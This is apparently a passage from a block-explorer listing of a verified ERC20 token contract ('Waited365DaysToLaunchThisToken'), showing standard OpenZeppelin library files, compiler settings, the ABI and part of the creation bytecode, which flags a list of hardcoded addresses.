     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(address owner, address spender, uint256 amount) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual {}
}

File 8 of 11 : IERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

File 9 of 11 : Ownable.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (access/Ownable.sol)

pragma solidity ^0.8.0;

import "./Context.sol";

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

File 10 of 11 : Context.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

File 11 of 11 : IERC20Metadata.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.0;

import "./IERC20.sol";

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

Settings
{
  "optimizer": {
    "enabled": false,
    "runs": 200
  },
  "outputSelection": {
    "*": {
      "*": [
        "evm.bytecode",
        "evm.deployedBytecode",
        "devdoc",
        "userdoc",
        "metadata",
        "abi"
      ]
    }
  }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"address","name":"wallet","type":"address"},{"internalType":"bytes32","name":"_deployer","type":"bytes32"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludeFromFees","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"pair","type":"address"},{"indexed":true,"internalType":"bool","name":"value","type":"bool"}],"name":"SetAutomatedMarketMakerPair","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"BuyFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"SellFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyCount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"clearStuckEth","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"clearStuckTokens","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"bool","name":"excluded","type":"bool"}],"name":"excludeFromFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"updAds","type":"address"},{"internalType":"bool","name":"isEx","type":"bool"}],"name":"excludeFromMaxTransaction","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"initialTotalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"isExcludedFromFees","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_address","type":"address"}],"name":"isM","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"m","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"percent","type":"uint256"}],"name":"manualswap","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"maxTransactionAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"openTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeTheLimits","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"sellCount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"pair","type":"address"},{"internalType":"bool","name":"value","type":"bool"}],"name":"setAutomatedMarketMakerPair","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_amount","type":"uint256"}],"name":"setSwapTokensAtAmount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"swapEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"swapTokensAtAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tradingOpen","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

60a060405269d3c21bcecceda1000000600a5569043c33c1937564800000600b5569043c33c1937564800000600c5569021e19e0c9bab2400000600d555f60105f6101000a81548160ff0219169083151502179055505f601060016101000a81548160ff02191690831515021790555060146011556014601255600a601355600a6014553480156200008f575f80fd5b506040516200628f3803806200628f8339818101604052810190620000b5919062001d10565b6040518060400160405280601e81526020017f57616974656433363544617973546f4c61756e636854686973546f6b656e00008152506040518060400160405280600381526020017f3336350000000000000000000000000000000000000000000000000000000000815250816003908162000132919062001fb9565b50806004908162000144919062001fb9565b505050620001676200015b6200179060201b60201c565b6200179760201b60201c565b600160065f73ae2fc483527b8ef99eb5d9b44875f005ba1fae1373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f7377223f67d845e3cbcd9cc19287e24e71f722888873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f7377ad3a15b78101883af36ad4a875e17c86ac65d173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f734504dfa3861ec902226278c9cb7a777a0111857473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f73e3df3043f1ceff4ee2705a6bd03b4a37f001029f73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f73e545c3cd397be0243475af52bcff8c64e9ead5d773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f73e2ca3167b89b8cf680d63b06e8aeefc5e4ebe90773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f6e05af2ddc1a93a03e9b7014064d3b8d73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f731653151fb636544f8ed1e7be91e4483b73523f6b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f72ac6d844810a1bd902220b5f0006100008b000073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f73294401773915b1060e582756b8d7f74caf80b09c73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f7113de30d1b1d830dcb7d54660f4778d2d4af573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f714ec2008200e43b243a000590d4cd4636000073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f73e8c060f8052e07423f71d445277c61ac5138a2e573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f736b75d8af000000e20b7a7ddf000ba900b4009a8073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f71b8e312942521fb3bf278d2ef2458b0d3f24373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f727933790a4f00000099e9001629d9fe7775b80073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f7376f36d497b51e48a288f03b4c1d7461e92247d5e73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f732d2a7d56773ae7d5c7b9f1b57f7be05039447b4d73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f73758e8229dd38cf11fa9e7c0d5f790b4ca16b3b1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f7377ad3a15b78101883af36ad4a875e17c86ac65d173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f6fa991c429ee2ec6df19d40fe0c80088b873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f73b20bc46930c412eae124aab8682fb0f2e528f22d73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f736c9b7a1e3526e55194530a2699cf70ffde1ab5b773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f731111e3ef0b6ae32e14a55e0e7cd9b8505177c2bf73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f70d40b595b94918a28b27d1e2c66f43a51d373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f73b8feffac830c45b4cd210ecdaab9d11995d338ee73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f7393ffb15d1fa91e0c320d058f00ee97f9e3c5009673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f7027f490acee7f11ab5fdd47209d6422c5a773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f73fb62f1009ada688aa8f544b7954585476ce41a1473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f7326ce7c1976c5eec83ea6ac22d83cb341b08850af73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f731fdb319cc1be16ff75ef84e408b0bc1594dd4d3c73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f73dd0ba0bead4b384fc0fef7ff44c27f39b86d053673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f739ff34847f2096ce7226385cb69add93b767ce53c73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f6e15159abc7d42e8e813328b5a034c0d73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f73927300011e3e02c4858a1b000027cc007f00000073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f733c005ba2000f0000ba000d69000ac8ec003800bc73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f6e3b3cc22af3ae1eac0440bcee416b4073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f73f9cafeb32467994e3affd61e30865e5ab32abe6873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f73429cf888dae41d589d57f6dc685707bec755fe6373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f73b49e09760f31e7af00c69861a10afb414e1c000873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f72a2712e3200e89c6b8500b2da5c6c943133000073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f73d75e7d1a42b616a24a8afa71a462d74738a87d5073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160065f736a8aeb3f8509c188775f65fd1e9eb5dd10abb8db73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550737a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1660808173ffffffffffffffffffffffffffffffffffffffff1681525050620013aa816200185a60201b60201c565b620013ec576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620013e390620020fb565b60405180910390fd5b60805173ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa15801562001438573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906200145e91906200211b565b73ffffffffffffffffffffffffffffffffffffffff1663c9c653963060805173ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015620014c6573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190620014ec91906200211b565b6040518363ffffffff1660e01b81526004016200150b9291906200215c565b6020604051808303815f875af115801562001528573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906200154e91906200211b565b60075f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550620015c160075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1660016200188d60201b60201c565b620015f560075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1660016200192b60201b60201c565b6200160a60805160016200192b60201b60201c565b8160095f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506200165d8260016200192b60201b60201c565b6200166d6200179060201b60201c565b60085f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550620016ce620016c06200199360201b60201c565b6001620019bb60201b60201c565b620016e1826001620019bb60201b60201c565b620016f4306001620019bb60201b60201c565b6200170961dead6001620019bb60201b60201c565b6200172b6200171d6200199360201b60201c565b60016200192b60201b60201c565b6200173e3060016200192b60201b60201c565b6200175361dead60016200192b60201b60201c565b6200178860085f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16600a5462001a7360201b60201c565b505062002396565b5f33905090565b5f60055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690508160055f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f81336040516020016200186f9190620021d4565b60405160208183030381529060405280519060200120149050919050565b8060175f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055508015158273ffffffffffffffffffffffffffffffffffffffff167fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab60405160405180910390a35050565b6200193b62001bd860201b60201c565b8060165f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055505050565b5f60055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b620019cb62001bd860201b60201c565b8060155f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df78260405162001a6791906200220c565b60405180910390a25050565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362001ae4576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040162001adb9062002275565b60405180910390fd5b62001af75f838362001c6960201b60201c565b8060025f82825462001b0a9190620022c2565b92505081905550805f808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055508173ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162001bb991906200230d565b60405180910390a362001bd45f838362001c6e60201b60201c565b5050565b62001be86200179060201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1662001c0e6200199360201b60201c565b73ffffffffffffffffffffffffffffffffffffffff161462001c67576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040162001c5e9062002376565b60405180910390fd5b565b505050565b505050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f62001ca28262001c77565b9050919050565b62001cb48162001c96565b811462001cbf575f80fd5b50565b5f8151905062001cd28162001ca9565b92915050565b5f819050919050565b62001cec8162001cd8565b811462001cf7575f80fd5b50565b5f8151905062001d0a8162001ce1565b92915050565b5f806040838503121562001d295762001d2862001c73565b5b5f62001d388582860162001cc2565b925050602062001d4b8582860162001cfa565b9150509250929050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168062001dd157607f821691505b60208210810362001de75762001de662001d8c565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f6008830262001e4b7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262001e0e565b62001e57868362001e0e565b95508019841693508086168417925050509392505050565b5f819050919050565b5f819050919050565b5f62001ea162001e9b62001e958462001e6f565b62001e78565b62001e6f565b9050919050565b5f819050919050565b62001ebc8362001e81565b62001ed462001ecb8262001ea8565b84845462001e1a565b825550505050565b5f90565b62001eea62001edc565b62001ef781848462001eb1565b505050565b5b8181101562001f1e5762001f125f8262001ee0565b60018101905062001efd565b5050565b601f82111562001f6d5762001f378162001ded565b62001f428462001dff565b8101602085101562001f52578190505b62001f6a62001f618562001dff565b83018262001efc565b50505b505050565b5f82821c905092915050565b5f62001f8f5f198460080262001f72565b1980831691505092915050565b5f62001fa9838362001f7e565b915082600202821